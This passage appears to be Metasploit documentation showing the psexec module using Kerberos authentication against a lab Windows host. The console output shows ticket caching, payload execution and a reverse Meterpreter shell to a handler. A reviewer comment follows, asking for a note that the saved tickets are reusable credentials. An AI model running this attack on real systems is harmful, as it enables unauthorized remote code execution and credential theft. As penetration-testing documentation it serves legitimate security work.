Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
Running psexec against a host:
```msf
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'...
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] 192.168.123.13:445 - Selecting PowerShell target
[*] 192.168.123.13:445 - Executing the payload...
[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000
meterpreter >
```
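Review bot: the transcript shows two credential-cache files written to `/Users/user/.msf4/loot/...mit.kerberos.cca_*.bin` but the text never says what they are; add a sentence that these are the TGT and TGS obtained for `Administrator`, that they are reusable Kerberos tickets, and that they need the same protection and cleanup as the password passed on the command line. If the linked [[Kerberos Service Authentication|kerberos/service_authentication]] page covers reuse of saved tickets, point to that section here as well.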
